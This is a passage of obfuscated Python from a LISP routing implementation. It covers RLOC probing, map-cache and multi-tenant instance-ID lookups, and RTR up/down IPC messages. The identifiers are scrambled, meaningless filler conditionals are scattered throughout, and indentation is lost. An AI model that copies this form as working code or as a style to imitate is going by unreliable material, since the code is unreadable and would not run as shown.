oOoooOOO0o0 . store_prefix ( parms [ "group-prefix" ] )
if 60 - 60: i1IIi / iII111i
if 10 - 10: I1Ii111 / OoOoOO00 * Ii1I % o0oOOo0O0Ooo . OoOoOO00 / I1ii11iIi11i
Ii11i1IiII = [ ]
oo0OO0O0 = lisp_site_eid_lookup ( I111o0oooO00o0 , oOoooOOO0o0 , False )
if ( oo0OO0O0 ) : lisp_gather_site_cache_data ( oo0OO0O0 , Ii11i1IiII )
return ( Ii11i1IiII )
if 2 - 2: iIii1I11I1II1
if 85 - 85: O0 - ooOoO0o
if 35 - 35: o0oOOo0O0Ooo - I1IiiI
if 47 - 47: i11iIiiIii * iII111i . OoOoOO00 * I1Ii111 % i11iIiiIii + Ii1I
if 65 - 65: Ii1I % i11iIiiIii
if 98 - 98: iII111i * o0oOOo0O0Ooo % Oo0Ooo
if 7 - 7: oO0o * OoooooooOO % o0oOOo0O0Ooo . I1Ii111 + O0
def lisp_get_interface_instance_id ( device , source_eid ) :
I1i = None
if ( lisp_myinterfaces . has_key ( device ) ) :
I1i = lisp_myinterfaces [ device ]
if 14 - 14: I11i * II111iiii % o0oOOo0O0Ooo / iII111i . OoooooooOO % iII111i
if 88 - 88: iII111i
if 94 - 94: OoooooooOO
if 32 - 32: I1ii11iIi11i
if 8 - 8: I11i * i11iIiiIii - ooOoO0o
if 47 - 47: ooOoO0o . I1IiiI / i11iIiiIii * iII111i * I1IiiI
if ( I1i == None or I1i . instance_id == None ) :
return ( lisp_default_iid )
if 8 - 8: oO0o % oO0o . iII111i / i1IIi % IiII
if 71 - 71: OoOoOO00 + oO0o % O0 + Oo0Ooo
if 62 - 62: i1IIi . Ii1I * i1IIi * O0 . I1IiiI % o0oOOo0O0Ooo
if 16 - 16: I11i . Ii1I - ooOoO0o . OOooOOo % O0 / oO0o
if 42 - 42: II111iiii . iII111i
if 67 - 67: i1IIi - i11iIiiIii / ooOoO0o * oO0o
if 64 - 64: oO0o / IiII
if 86 - 86: I11i
if 36 - 36: o0oOOo0O0Ooo / OoO0O00
oOo00Ooo0o0 = I1i . get_instance_id ( )
if ( source_eid == None ) : return ( oOo00Ooo0o0 )
if 6 - 6: I11i % I1IiiI + iII111i * OoooooooOO . O0
O000iI1ii1I = source_eid . instance_id
OOOOo00oo0OO = None
for I1i in lisp_multi_tenant_interfaces :
if ( I1i . device != device ) : continue
O000 = I1i . multi_tenant_eid
source_eid . instance_id = O000 . instance_id
if ( source_eid . is_more_specific ( O000 ) == False ) : continue
if ( OOOOo00oo0OO == None or OOOOo00oo0OO . multi_tenant_eid . mask_len < O000 . mask_len ) :
OOOOo00oo0OO = I1i
if 34 - 34: iIii1I11I1II1
if 26 - 26: iII111i / IiII * iII111i
source_eid . instance_id = O000iI1ii1I
if 91 - 91: Oo0Ooo
if ( OOOOo00oo0OO == None ) : return ( oOo00Ooo0o0 )
return ( OOOOo00oo0OO . get_instance_id ( ) )
if 98 - 98: iIii1I11I1II1 . OoO0O00
if 1 - 1: OOooOOo % Oo0Ooo
if 86 - 86: i11iIiiIii
if 57 - 57: iII111i - OoooooooOO - ooOoO0o % II111iiii
if 62 - 62: i11iIiiIii . Oo0Ooo / Oo0Ooo . IiII . OoooooooOO
if 86 - 86: I1ii11iIi11i * OoOoOO00 + iII111i
if 79 - 79: I11i - II111iiii
if 27 - 27: I1IiiI + o0oOOo0O0Ooo * oO0o % I1IiiI
if 66 - 66: OoO0O00 + IiII . o0oOOo0O0Ooo . IiII
def lisp_allow_dynamic_eid ( device , eid ) :
if ( lisp_myinterfaces . has_key ( device ) == False ) : return ( None )
if 88 - 88: oO0o + oO0o % OoO0O00 . OoooooooOO - OoooooooOO . Oo0Ooo
I1i = lisp_myinterfaces [ device ]
iii1iI1I1i11 = device if I1i . dynamic_eid_device == None else I1i . dynamic_eid_device
if 3 - 3: OoOoOO00 / o0oOOo0O0Ooo * O0
if 32 - 32: o0oOOo0O0Ooo / I1Ii111 + I1Ii111
if ( I1i . does_dynamic_eid_match ( eid ) ) : return ( iii1iI1I1i11 )
return ( None )
if 69 - 69: iIii1I11I1II1 * o0oOOo0O0Ooo * II111iiii + OoooooooOO . Ii1I
if 99 - 99: Ii1I % iIii1I11I1II1 . I1Ii111 / iIii1I11I1II1 / oO0o
if 76 - 76: I1Ii111
if 27 - 27: I1ii11iIi11i
if 72 - 72: OoooooooOO - IiII
if 8 - 8: i11iIiiIii + I11i . II111iiii . O0
if 21 - 21: i1IIi * Oo0Ooo / iII111i . iIii1I11I1II1 % OOooOOo % i1IIi
def lisp_start_rloc_probe_timer ( interval , lisp_sockets ) :
global lisp_rloc_probe_timer
if 8 - 8: OoO0O00 % OoO0O00 * i1IIi / Oo0Ooo * i1IIi . i11iIiiIii
if ( lisp_rloc_probe_timer != None ) : lisp_rloc_probe_timer . cancel ( )
if 10 - 10: O0 . Ii1I . i1IIi
Iii1iI1Ii1I = lisp_process_rloc_probe_timer
iiIi = threading . Timer ( interval , Iii1iI1Ii1I , [ lisp_sockets ] )
lisp_rloc_probe_timer = iiIi
iiIi . start ( )
return
if 63 - 63: OoooooooOO * iII111i
if 8 - 8: OoooooooOO * i11iIiiIii * iII111i * O0 - OoOoOO00
if 3 - 3: OoooooooOO % oO0o + OoOoOO00 % I1IiiI
if 50 - 50: OoO0O00 - Oo0Ooo
if 13 - 13: OoOoOO00
if 72 - 72: II111iiii * iII111i . II111iiii + iII111i * IiII
if 90 - 90: oO0o * I1Ii111 / O0
def lisp_show_rloc_probe_list ( ) :
lprint ( bold ( "----- RLOC-probe-list -----" , False ) )
for iII1 in lisp_rloc_probe_list :
IIiii1IiiIiii = lisp_rloc_probe_list [ iII1 ]
lprint ( "RLOC {}:" . format ( iII1 ) )
for O0OooO0oo , o0OoO00 , II1IIiIiiI1iI in IIiii1IiiIiii :
lprint ( " [{}, {}, {}, {}]" . format ( hex ( id ( O0OooO0oo ) ) , o0OoO00 . print_prefix ( ) ,
II1IIiIiiI1iI . print_prefix ( ) , O0OooO0oo . translated_port ) )
if 81 - 81: I11i
if 31 - 31: OoooooooOO - OoO0O00 . iIii1I11I1II1 % I1IiiI
lprint ( bold ( "---------------------------" , False ) )
return
if 98 - 98: I1IiiI + Ii1I
if 7 - 7: o0oOOo0O0Ooo . OoooooooOO
if 32 - 32: I1ii11iIi11i
if 46 - 46: Ii1I . i11iIiiIii / I1Ii111 - I1ii11iIi11i
if 13 - 13: IiII % I1Ii111
if 9 - 9: OoooooooOO * ooOoO0o % I1ii11iIi11i . I1IiiI % O0
if 91 - 91: OOooOOo * OoooooooOO * I1IiiI . i1IIi
if 9 - 9: oO0o / i11iIiiIii + IiII / IiII - I11i
if 87 - 87: iII111i
def lisp_mark_rlocs_for_other_eids ( eid_list ) :
if 37 - 37: oO0o + OoO0O00
if 66 - 66: iIii1I11I1II1 * iIii1I11I1II1 + IiII % I1IiiI
if 60 - 60: I1Ii111 . IiII / Oo0Ooo
if 32 - 32: OoOoOO00 + Ii1I * iII111i % Oo0Ooo
OooO0ooO0o0OO , o0OoO00 , II1IIiIiiI1iI = eid_list [ 0 ]
ooO0oOoooo = [ lisp_print_eid_tuple ( o0OoO00 , II1IIiIiiI1iI ) ]
if 91 - 91: I1IiiI + IiII / OOooOOo - i1IIi % i11iIiiIii / iIii1I11I1II1
for OooO0ooO0o0OO , o0OoO00 , II1IIiIiiI1iI in eid_list [ 1 : : ] :
OooO0ooO0o0OO . state = LISP_RLOC_UNREACH_STATE
OooO0ooO0o0OO . last_state_change = lisp_get_timestamp ( )
ooO0oOoooo . append ( lisp_print_eid_tuple ( o0OoO00 , II1IIiIiiI1iI ) )
if 73 - 73: i11iIiiIii . I1ii11iIi11i * OoOoOO00
if 95 - 95: i1IIi + iIii1I11I1II1 . I1Ii111 / I1Ii111
oO0IiI1iiII11II1 = bold ( "unreachable" , False )
ii11IiI = red ( OooO0ooO0o0OO . rloc . print_address_no_iid ( ) , False )
if 81 - 81: I1IiiI . I1Ii111
for I111o0oooO00o0 in ooO0oOoooo :
o0OoO00 = green ( I111o0oooO00o0 , False )
lprint ( "RLOC {} went {} for EID {}" . format ( ii11IiI , oO0IiI1iiII11II1 , o0OoO00 ) )
if 74 - 74: II111iiii - o0oOOo0O0Ooo + ooOoO0o - iIii1I11I1II1 / OoO0O00
if 89 - 89: I1Ii111 + ooOoO0o + I1Ii111
if 35 - 35: O0 * OoOoOO00
if 54 - 54: O0 / Oo0Ooo
if 54 - 54: OoO0O00
if 38 - 38: II111iiii + o0oOOo0O0Ooo * I11i + I1Ii111 - II111iiii . OOooOOo
for OooO0ooO0o0OO , o0OoO00 , II1IIiIiiI1iI in eid_list :
OoOoooooO00oo = lisp_map_cache . lookup_cache ( o0OoO00 , True )
if ( OoOoooooO00oo ) : lisp_write_ipc_map_cache ( True , OoOoooooO00oo )
if 38 - 38: I1ii11iIi11i % OOooOOo + iII111i / Oo0Ooo / IiII / oO0o
return
if 2 - 2: iIii1I11I1II1
if 9 - 9: I1Ii111 / IiII
if 33 - 33: o0oOOo0O0Ooo + oO0o . o0oOOo0O0Ooo . I11i * OoooooooOO + iIii1I11I1II1
if 64 - 64: OoooooooOO . Ii1I
if 38 - 38: Oo0Ooo
if 64 - 64: ooOoO0o % i11iIiiIii
if 10 - 10: Ii1I % oO0o + oO0o * OoOoOO00 % iII111i / o0oOOo0O0Ooo
if 17 - 17: iII111i / I1IiiI . II111iiii - OoO0O00 + iII111i
if 22 - 22: Oo0Ooo - I1ii11iIi11i + I11i . oO0o
if 85 - 85: iIii1I11I1II1 / Ii1I
def lisp_process_rloc_probe_timer ( lisp_sockets ) :
lisp_set_exception ( )
if 43 - 43: I1IiiI % I1Ii111 - oO0o . II111iiii / iIii1I11I1II1
lisp_start_rloc_probe_timer ( LISP_RLOC_PROBE_INTERVAL , lisp_sockets )
if ( lisp_rloc_probing == False ) : return
if 97 - 97: I1Ii111 + I1ii11iIi11i
if 21 - 21: O0 + o0oOOo0O0Ooo * OoooooooOO % IiII % I1ii11iIi11i
if 80 - 80: I11i
if 28 - 28: OoOoOO00 * OoooooooOO * i11iIiiIii
if ( lisp_print_rloc_probe_list ) : lisp_show_rloc_probe_list ( )
if 88 - 88: ooOoO0o + ooOoO0o / I1Ii111
if 69 - 69: O0 * o0oOOo0O0Ooo + i1IIi * ooOoO0o . o0oOOo0O0Ooo
if 46 - 46: Oo0Ooo / Oo0Ooo * IiII
if 65 - 65: iIii1I11I1II1 * o0oOOo0O0Ooo - iII111i % II111iiii - I1ii11iIi11i
o0Oo0O00oo = lisp_get_default_route_next_hops ( )
if 11 - 11: I1ii11iIi11i + iIii1I11I1II1 - I1Ii111 * iIii1I11I1II1 * IiII + oO0o
lprint ( "---------- Start RLOC Probing for {} entries ----------" . format ( len ( lisp_rloc_probe_list ) ) )
if 6 - 6: I1Ii111 * OOooOOo + i1IIi - Ii1I / oO0o
if 81 - 81: I1Ii111 % oO0o * i1IIi * OoooooooOO / Oo0Ooo
if 70 - 70: I1IiiI
if 35 - 35: i11iIiiIii
if 59 - 59: ooOoO0o . iII111i - II111iiii
OoO = 0
Ii1I11IiI1I1 = bold ( "RLOC-probe" , False )
for iII1ii1IiII in lisp_rloc_probe_list . values ( ) :
if 26 - 26: Ii1I * Oo0Ooo + II111iiii + Ii1I
if 70 - 70: I1ii11iIi11i + i1IIi
if 54 - 54: I1IiiI - i11iIiiIii - i11iIiiIii / oO0o
if 43 - 43: I11i / OOooOOo + OOooOOo
if 62 - 62: OOooOOo . iIii1I11I1II1 + I1IiiI / OOooOOo
oo0OOoOOOO = None
for iiIiII1iiI1i1 , I111o0oooO00o0 , oOoooOOO0o0 in iII1ii1IiII :
oOo0O = iiIiII1iiI1i1 . rloc . print_address_no_iid ( )
if 63 - 63: iIii1I11I1II1 . OoooooooOO
if 78 - 78: I1IiiI / iIii1I11I1II1 / I1IiiI
if 21 - 21: oO0o - IiII
if 61 - 61: o0oOOo0O0Ooo
OoOO0OOOO0 , o0oO , oOoOoO0Oo0oo = lisp_allow_gleaning ( I111o0oooO00o0 , None , iiIiII1iiI1i1 )
if ( o0oO == False ) :
o0OoO00 = green ( I111o0oooO00o0 . print_address ( ) , False )
oOo0O += ":{}" . format ( iiIiII1iiI1i1 . translated_port )
lprint ( "Suppress probe to RLOC {} for gleaned EID {}" . format ( red ( oOo0O , False ) , o0OoO00 ) )
if 72 - 72: Oo0Ooo - OoOoOO00 . II111iiii - Ii1I
continue
if 22 - 22: O0 . OoooooooOO + o0oOOo0O0Ooo / Oo0Ooo . iIii1I11I1II1
if 30 - 30: OoOoOO00 + ooOoO0o + i1IIi . OoooooooOO . i11iIiiIii
if 49 - 49: I1IiiI - oO0o % OOooOOo / O0 / II111iiii
if 41 - 41: IiII % II111iiii
if 99 - 99: IiII - O0
if 59 - 59: iII111i % O0 + OOooOOo * ooOoO0o
if 27 - 27: I1Ii111 % i11iIiiIii * I1IiiI
if ( iiIiII1iiI1i1 . down_state ( ) ) : continue
if 19 - 19: OoOoOO00 / o0oOOo0O0Ooo - iII111i / OoO0O00
if 12 - 12: I1ii11iIi11i - I11i * O0 % I1IiiI + O0 - II111iiii
if 13 - 13: iII111i / OOooOOo * i11iIiiIii / oO0o / OoooooooOO
if 89 - 89: Ii1I * Oo0Ooo / I1Ii111 * I1ii11iIi11i + O0 * Oo0Ooo
if 74 - 74: I11i . I11i
if 74 - 74: OoOoOO00 * ooOoO0o * I1Ii111
if 56 - 56: iIii1I11I1II1 * OoO0O00 - oO0o * Ii1I
if 62 - 62: i1IIi + I11i / OOooOOo - OoooooooOO % i1IIi . I1IiiI
if 13 - 13: O0 * iII111i
if 26 - 26: i1IIi - I1Ii111 - ooOoO0o
if 73 - 73: o0oOOo0O0Ooo . OoooooooOO
if ( oo0OOoOOOO ) :
iiIiII1iiI1i1 . last_rloc_probe_nonce = oo0OOoOOOO . last_rloc_probe_nonce
if 96 - 96: i1IIi - OOooOOo / I11i % OoOoOO00 - i11iIiiIii % II111iiii
if ( oo0OOoOOOO . translated_port == iiIiII1iiI1i1 . translated_port and oo0OOoOOOO . rloc_name == iiIiII1iiI1i1 . rloc_name ) :
if 47 - 47: I1Ii111 * iII111i
o0OoO00 = green ( lisp_print_eid_tuple ( I111o0oooO00o0 , oOoooOOO0o0 ) , False )
lprint ( "Suppress probe to duplicate RLOC {} for {}" . format ( red ( oOo0O , False ) , o0OoO00 ) )
if 90 - 90: i1IIi * Ii1I . OoO0O00 % I11i * ooOoO0o . OOooOOo
continue
if 76 - 76: iIii1I11I1II1 . i11iIiiIii * II111iiii - iII111i
if 51 - 51: I1IiiI
if 52 - 52: I1Ii111
I1ii1I1II11II = None
OooO0ooO0o0OO = None
while ( True ) :
OooO0ooO0o0OO = iiIiII1iiI1i1 if OooO0ooO0o0OO == None else OooO0ooO0o0OO . next_rloc
if ( OooO0ooO0o0OO == None ) : break
if 82 - 82: iII111i + II111iiii
if 29 - 29: O0 % Ii1I * ooOoO0o % O0
if 83 - 83: oO0o
if 95 - 95: Oo0Ooo * O0 % i1IIi / iII111i + oO0o
if 85 - 85: iIii1I11I1II1 / I11i
if ( OooO0ooO0o0OO . rloc_next_hop != None ) :
if ( OooO0ooO0o0OO . rloc_next_hop not in o0Oo0O00oo ) :
if ( OooO0ooO0o0OO . up_state ( ) ) :
Ii , oooOoo0 = OooO0ooO0o0OO . rloc_next_hop
OooO0ooO0o0OO . state = LISP_RLOC_UNREACH_STATE
OooO0ooO0o0OO . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( OooO0ooO0o0OO . rloc , False )
if 65 - 65: I11i / i1IIi * OoOoOO00 * Ii1I * OoO0O00
oO0IiI1iiII11II1 = bold ( "unreachable" , False )
lprint ( "Next-hop {}({}) for RLOC {} is {}" . format ( oooOoo0 , Ii ,
red ( oOo0O , False ) , oO0IiI1iiII11II1 ) )
continue
if 74 - 74: I1ii11iIi11i . I1ii11iIi11i % IiII + OOooOOo . OoO0O00 * I11i
if 20 - 20: OOooOOo % i1IIi * Ii1I / i11iIiiIii
if 89 - 89: ooOoO0o
if 83 - 83: I11i . I11i * OOooOOo - OOooOOo
if 46 - 46: iIii1I11I1II1 . I1Ii111 % I1IiiI
if 22 - 22: i1IIi * I11i + II111iiii + II111iiii
i11 = OooO0ooO0o0OO . last_rloc_probe
iIi1i1iIi1 = 0 if i11 == None else time . time ( ) - i11
if ( OooO0ooO0o0OO . unreach_state ( ) and iIi1i1iIi1 < LISP_RLOC_PROBE_INTERVAL ) :
lprint ( "Waiting for probe-reply from RLOC {}" . format ( red ( oOo0O , False ) ) )
if 23 - 23: ooOoO0o + Oo0Ooo
continue
if 43 - 43: Ii1I
if 87 - 87: OoO0O00
if 32 - 32: I11i
if 78 - 78: ooOoO0o * iII111i
if 31 - 31: I1IiiI + OOooOOo . OoooooooOO
if 24 - 24: ooOoO0o
oOo0ooO0O0oo = lisp_get_echo_nonce ( None , oOo0O )
if ( oOo0ooO0O0oo and oOo0ooO0O0oo . request_nonce_timeout ( ) ) :
OooO0ooO0o0OO . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
OooO0ooO0o0OO . last_state_change = lisp_get_timestamp ( )
oO0IiI1iiII11II1 = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, nonce-echo failed" . format ( red ( oOo0O , False ) , oO0IiI1iiII11II1 ) )
if 53 - 53: I1ii11iIi11i % OOooOOo
lisp_update_rtr_updown ( OooO0ooO0o0OO . rloc , False )
continue
if 92 - 92: I1IiiI / ooOoO0o
if 5 - 5: OoooooooOO - oO0o
if 52 - 52: I11i . OOooOOo * ooOoO0o / i11iIiiIii . OoO0O00 * ooOoO0o
if 58 - 58: i1IIi - OoO0O00 * II111iiii
if 92 - 92: ooOoO0o / I1Ii111 . iII111i
if 59 - 59: Ii1I - OoO0O00 % iII111i + I1ii11iIi11i * iII111i
if ( oOo0ooO0O0oo and oOo0ooO0O0oo . recently_echoed ( ) ) :
lprint ( ( "Suppress RLOC-probe to {}, nonce-echo " + "received" ) . format ( red ( oOo0O , False ) ) )
if 51 - 51: ooOoO0o - Oo0Ooo / iII111i . I11i - Ii1I / OOooOOo
continue
if 4 - 4: II111iiii + OoOoOO00 . ooOoO0o - I11i . I1IiiI
if 46 - 46: II111iiii
if 38 - 38: OOooOOo % II111iiii
if 82 - 82: i11iIiiIii . OoooooooOO % OoOoOO00 * O0 - I1Ii111
if 78 - 78: OoOoOO00 % Ii1I % OOooOOo % Oo0Ooo % I11i . Ii1I
if 73 - 73: OoooooooOO / i1IIi . iIii1I11I1II1
if ( OooO0ooO0o0OO . last_rloc_probe != None ) :
i11 = OooO0ooO0o0OO . last_rloc_probe_reply
if ( i11 == None ) : i11 = 0
iIi1i1iIi1 = time . time ( ) - i11
if ( OooO0ooO0o0OO . up_state ( ) and iIi1i1iIi1 >= LISP_RLOC_PROBE_REPLY_WAIT ) :
if 89 - 89: I1Ii111
OooO0ooO0o0OO . state = LISP_RLOC_UNREACH_STATE
OooO0ooO0o0OO . last_state_change = lisp_get_timestamp ( )
lisp_update_rtr_updown ( OooO0ooO0o0OO . rloc , False )
oO0IiI1iiII11II1 = bold ( "unreachable" , False )
lprint ( "RLOC {} went {}, probe it" . format ( red ( oOo0O , False ) , oO0IiI1iiII11II1 ) )
if 29 - 29: I11i * ooOoO0o - OoooooooOO
if 92 - 92: O0 % i1IIi / OOooOOo - oO0o
lisp_mark_rlocs_for_other_eids ( iII1ii1IiII )
if 83 - 83: o0oOOo0O0Ooo . OoO0O00 % iIii1I11I1II1 % OoOoOO00 - i11iIiiIii
if 71 - 71: I1ii11iIi11i - II111iiii / O0 % i1IIi + oO0o
if 73 - 73: OoooooooOO
OooO0ooO0o0OO . last_rloc_probe = lisp_get_timestamp ( )
if 25 - 25: i1IIi . II111iiii . I1Ii111
Oo0OooO = "" if OooO0ooO0o0OO . unreach_state ( ) == False else " unreachable"
if 12 - 12: oO0o + iII111i - ooOoO0o % O0 + I1Ii111
if 15 - 15: I1Ii111 * iIii1I11I1II1 - iIii1I11I1II1 - O0
if 41 - 41: O0 - i11iIiiIii - I1Ii111 + i1IIi - iIii1I11I1II1 . Oo0Ooo
if 38 - 38: Oo0Ooo - I1ii11iIi11i
if 19 - 19: Ii1I * OoO0O00 / OoO0O00 . II111iiii % iIii1I11I1II1
if 61 - 61: I1ii11iIi11i * oO0o % iII111i + IiII + i11iIiiIii * I11i
if 3 - 3: Ii1I
OoI1i1 = ""
oooOoo0 = None
if ( OooO0ooO0o0OO . rloc_next_hop != None ) :
Ii , oooOoo0 = OooO0ooO0o0OO . rloc_next_hop
lisp_install_host_route ( oOo0O , oooOoo0 , True )
OoI1i1 = ", send on nh {}({})" . format ( oooOoo0 , Ii )
if 73 - 73: OoO0O00 / iII111i
if 40 - 40: I11i + IiII * Oo0Ooo . OoooooooOO * I1IiiI
if 91 - 91: ooOoO0o / oO0o * OOooOOo . II111iiii - I11i - I11i
if 5 - 5: O0 + OoooooooOO + i11iIiiIii * Oo0Ooo * OoOoOO00 . oO0o
if 6 - 6: OoO0O00 % Oo0Ooo % I1IiiI % o0oOOo0O0Ooo % O0 % Oo0Ooo
I1i1IIiI = OooO0ooO0o0OO . print_rloc_probe_rtt ( )
O0oiIIi1 = oOo0O
if ( OooO0ooO0o0OO . translated_port != 0 ) :
O0oiIIi1 += ":{}" . format ( OooO0ooO0o0OO . translated_port )
if 32 - 32: OOooOOo % O0 * II111iiii % OoO0O00 - I1IiiI * OOooOOo
O0oiIIi1 = red ( O0oiIIi1 , False )
if ( OooO0ooO0o0OO . rloc_name != None ) :
O0oiIIi1 += " (" + blue ( OooO0ooO0o0OO . rloc_name , False ) + ")"
if 80 - 80: OOooOOo * I11i / OOooOOo - oO0o
lprint ( "Send {}{} {}, last rtt: {}{}" . format ( Ii1I11IiI1I1 , Oo0OooO ,
O0oiIIi1 , I1i1IIiI , OoI1i1 ) )
if 18 - 18: i1IIi - OOooOOo - o0oOOo0O0Ooo - iIii1I11I1II1
if 72 - 72: OoooooooOO % I1IiiI . OoO0O00
if 28 - 28: II111iiii / iIii1I11I1II1 / iII111i - o0oOOo0O0Ooo . I1IiiI / O0
if 16 - 16: ooOoO0o * oO0o . OoooooooOO
if 44 - 44: iIii1I11I1II1 * OOooOOo + OoO0O00 - OoooooooOO
if 13 - 13: Oo0Ooo . I11i . II111iiii
if 6 - 6: OOooOOo . IiII / OoO0O00 * oO0o - I1Ii111 . OoOoOO00
if 85 - 85: i11iIiiIii + OoOoOO00
if ( OooO0ooO0o0OO . rloc_next_hop != None ) :
I1ii1I1II11II = lisp_get_host_route_next_hop ( oOo0O )
if ( I1ii1I1II11II ) : lisp_install_host_route ( oOo0O , I1ii1I1II11II , False )
if 4 - 4: OOooOOo . OoO0O00 * II111iiii + OoO0O00 % Oo0Ooo
if 60 - 60: OOooOOo . Ii1I
if 13 - 13: i1IIi . iII111i / OoOoOO00 . I1Ii111
if 65 - 65: oO0o % I1Ii111 % OoO0O00 . iIii1I11I1II1
if 38 - 38: IiII / I11i / IiII * iII111i
if 30 - 30: oO0o
if ( OooO0ooO0o0OO . rloc . is_null ( ) ) :
OooO0ooO0o0OO . rloc . copy_address ( iiIiII1iiI1i1 . rloc )
if 30 - 30: IiII / OoO0O00
if 89 - 89: oO0o . OoOoOO00 . IiII / iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00
if 86 - 86: OoooooooOO - iIii1I11I1II1 . OoO0O00 * Ii1I / I1Ii111 + I1Ii111
if 52 - 52: iIii1I11I1II1 % OoO0O00 - IiII % i11iIiiIii - o0oOOo0O0Ooo
if 25 - 25: Oo0Ooo - OOooOOo . i1IIi * OoOoOO00 / I11i / o0oOOo0O0Ooo
Oooo0OOO0oo0o = None if ( oOoooOOO0o0 . is_null ( ) ) else I111o0oooO00o0
OOOoOO0o00o0o = I111o0oooO00o0 if ( oOoooOOO0o0 . is_null ( ) ) else oOoooOOO0o0
lisp_send_map_request ( lisp_sockets , 0 , Oooo0OOO0oo0o , OOOoOO0o00o0o , OooO0ooO0o0OO )
oo0OOoOOOO = iiIiII1iiI1i1
if 17 - 17: i1IIi - ooOoO0o
if 86 - 86: I1ii11iIi11i . o0oOOo0O0Ooo
if 30 - 30: o0oOOo0O0Ooo / i11iIiiIii
if 33 - 33: OOooOOo % OoooooooOO
if ( oooOoo0 ) : lisp_install_host_route ( oOo0O , oooOoo0 , False )
if 98 - 98: Ii1I
if 38 - 38: ooOoO0o - iII111i * OOooOOo % I1ii11iIi11i + Oo0Ooo
if 95 - 95: iIii1I11I1II1 / O0 % O0
if 53 - 53: ooOoO0o . ooOoO0o
if 80 - 80: i11iIiiIii % I1Ii111 % I1IiiI / I1IiiI + oO0o + iII111i
if ( I1ii1I1II11II ) : lisp_install_host_route ( oOo0O , I1ii1I1II11II , True )
if 18 - 18: OoO0O00 * ooOoO0o
if 32 - 32: oO0o . OoooooooOO - o0oOOo0O0Ooo + II111iiii
if 4 - 4: OOooOOo * I1IiiI - I11i - I11i
if 67 - 67: I1IiiI
OoO += 1
if ( ( OoO % 10 ) == 0 ) : time . sleep ( 0.020 )
if 32 - 32: oO0o * i11iIiiIii - I11i % Oo0Ooo * I1ii11iIi11i
if 79 - 79: II111iiii / Oo0Ooo / I1ii11iIi11i
if 30 - 30: I11i . o0oOOo0O0Ooo / II111iiii
lprint ( "---------- End RLOC Probing ----------" )
return
if 59 - 59: i11iIiiIii
if 5 - 5: i11iIiiIii + o0oOOo0O0Ooo . OoO0O00 % OoOoOO00 + I11i
if 59 - 59: I1ii11iIi11i
if 47 - 47: I1IiiI + Oo0Ooo
if 78 - 78: i1IIi / I1ii11iIi11i % ooOoO0o * OoO0O00
if 10 - 10: i1IIi % ooOoO0o / iII111i
if 98 - 98: IiII / o0oOOo0O0Ooo - i1IIi - OOooOOo
if 65 - 65: Ii1I + OoOoOO00 * Oo0Ooo . O0 . IiII
def lisp_update_rtr_updown ( rtr , updown ) :
global lisp_ipc_socket
if 33 - 33: i11iIiiIii . i1IIi . I1Ii111 - OoOoOO00 + OOooOOo
if 34 - 34: I1ii11iIi11i . i1IIi * O0 / OoooooooOO
if 22 - 22: OOooOOo % o0oOOo0O0Ooo - i11iIiiIii
if 58 - 58: IiII . Ii1I + II111iiii
if ( lisp_i_am_itr == False ) : return
if 31 - 31: i11iIiiIii + i11iIiiIii + I11i * Oo0Ooo . I11i
if 28 - 28: OOooOOo * iIii1I11I1II1 * OoOoOO00
if 75 - 75: Oo0Ooo % IiII + II111iiii + oO0o
if 35 - 35: I1ii11iIi11i - oO0o - O0 / iII111i % IiII
if 10 - 10: OOooOOo + oO0o - I1Ii111 . I1IiiI
if ( lisp_register_all_rtrs ) : return
if 11 - 11: I1ii11iIi11i . I1Ii111 / o0oOOo0O0Ooo + IiII
OOoOOo0o0oo0Ooo = rtr . print_address_no_iid ( )
if 16 - 16: I11i - ooOoO0o
if 54 - 54: oO0o * II111iiii
if 79 - 79: o0oOOo0O0Ooo . ooOoO0o . Oo0Ooo * OoooooooOO
if 98 - 98: ooOoO0o
if 73 - 73: I1Ii111
if ( lisp_rtr_list . has_key ( OOoOOo0o0oo0Ooo ) == False ) : return
if 97 - 97: OoO0O00 * Ii1I + Oo0Ooo
updown = "up" if updown else "down"
lprint ( "Send ETR IPC message, RTR {} has done {}" . format (
red ( OOoOOo0o0oo0Ooo , False ) , bold ( updown , False ) ) )
if 83 - 83: II111iiii - Oo0Ooo % II111iiii * o0oOOo0O0Ooo
if 51 - 51: iII111i * iIii1I11I1II1 % Ii1I * Ii1I + i11iIiiIii . OoooooooOO
if 54 - 54: i11iIiiIii . iIii1I11I1II1 * iIii1I11I1II1 + Ii1I % I11i - OoO0O00
if 16 - 16: IiII % iIii1I11I1II1 * i11iIiiIii + O0
oOO0O = "rtr%{}%{}" . format ( OOoOOo0o0oo0Ooo , updown )
oOO0O = lisp_command_ipc ( oOO0O , "lisp-itr" )
lisp_ipc ( oOO0O , lisp_ipc_socket , "lisp-etr" )
return
if 76 - 76: iII111i * OOooOOo
if 7 - 7: ooOoO0o + o0oOOo0O0Ooo + o0oOOo0O0Ooo
if 73 - 73: IiII % I11i % i11iIiiIii + ooOoO0o
if 83 - 83: Ii1I * I1Ii111 * i11iIiiIii / iIii1I11I1II1 % I1ii11iIi11i
if 40 - 40: iII111i
if 21 - 21: I1Ii111 / iII111i + Oo0Ooo / I1ii11iIi11i / I1Ii111
if 33 - 33: OoooooooOO
def lisp_process_rloc_probe_reply ( rloc , source , port , nonce , hop_count , ttl ) :
Ii1I11IiI1I1 = bold ( "RLOC-probe reply" , False )
Ooooo00o0 = rloc . print_address_no_iid ( )
Ii1IIi1 = source . print_address_no_iid ( )
oOO0O0OoooO00O = lisp_rloc_probe_list
if 17 - 17: II111iiii
if 91 - 91: oO0o - oO0o % Ii1I % iIii1I11I1II1 / OoOoOO00
if 60 - 60: I1IiiI / iIii1I11I1II1 - o0oOOo0O0Ooo / OoooooooOO * OoooooooOO
if 22 - 22: I1ii11iIi11i . Oo0Ooo - o0oOOo0O0Ooo * Oo0Ooo . i1IIi * OoO0O00
if 7 - 7: O0 / I1IiiI + OoO0O00 . i1IIi - ooOoO0o + ooOoO0o
if 93 - 93: oO0o - I1IiiI / I1ii11iIi11i % o0oOOo0O0Ooo / OoooooooOO + II111iiii
O0o00o000oO = Ooooo00o0
if ( oOO0O0OoooO00O . has_key ( O0o00o000oO ) == False ) :
O0o00o000oO += ":" + str ( port )
if ( oOO0O0OoooO00O . has_key ( O0o00o000oO ) == False ) :
O0o00o000oO = Ii1IIi1
if ( oOO0O0OoooO00O . has_key ( O0o00o000oO ) == False ) :
O0o00o000oO += ":" + str ( port )
